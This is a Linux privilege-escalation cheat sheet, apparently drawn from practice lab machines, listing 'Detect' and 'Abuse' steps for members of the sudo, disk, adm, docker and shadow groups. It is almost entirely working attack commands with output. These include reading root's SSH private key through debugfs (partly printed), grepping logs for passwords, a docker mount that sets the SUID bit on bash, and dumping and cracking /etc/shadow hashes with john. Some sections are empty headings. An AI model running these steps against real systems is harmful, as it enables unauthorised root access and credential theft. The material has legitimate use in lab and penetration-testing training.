Linux (Privilege Escalation)

sudo

Detect

low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),27(sudo)

Abuse

low@vulnyx:~$ sudo su
root@vulnyx:~# id
uid=0(root) gid=0(root) groups=0(root)

disk

Detect

low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),6(disk)

Abuse

low@vulnyx:~$ df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            480M     0  480M   0% /dev
tmpfs            99M  3.2M   96M   4% /run
/dev/sda1        11G  2.2G  8.1G  21% /
tmpfs           494M     0  494M   0% /dev/shm

low@vulnyx:~$ /usr/sbin/debugfs /dev/sda1
debugfs 1.44.5 (15-Dec-2018)
debugfs: ls /root
debugfs: ls /root/.ssh/
debugfs: cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAstkGmc1W+epM0w13VQrLO/wMNWwxFltotpa9elYJVXSlBc+PgF6I

adm

Detect

low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),4(adm)

Abuse

low@vulnyx:~$ grep --color -Eri "pass|password" /var/log 2>/dev/null

docker

Detect

low@vulnyx:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),109(docker)

Abuse

low@vulnyx:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# chmod 4755 /bin/bash
# exit
low@vulnyx:~$ /bin/bash -pi

lxd

shadow

Detect

low@vulnyx:~$ id
uid=1000(user) gid=1000(user) grupos=1000(user),42(shadow)

low@vulnyx:~$ ls -l /etc/shadow
-rw-r----- 1 root shadow 719 mar 27 08:04 /etc/shadow

Abuse

low@vulnyx:~$ cat /etc/shadow | grep "\$y" | awk -F: '{print $1 $2}'
root$y$j9T$IwIIKD8L9jCb0lqWAWgB/0$OBiTPAluE/7llChagMz3WMBQR9ws4v1OWPwk/SyHqzD
user$y$j9T$JT/GEG2SlAAxdRYVRwob0.$P/Nsg/JHeFdXy1/.MDUDbcHKUAe8BeEXVrsQJm1.T7/
Hash Cracking
 john --wordlist=/opt/rockyou.txt crack --format=crypt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockyou          (root)     
123456           (user)

fail2ban

video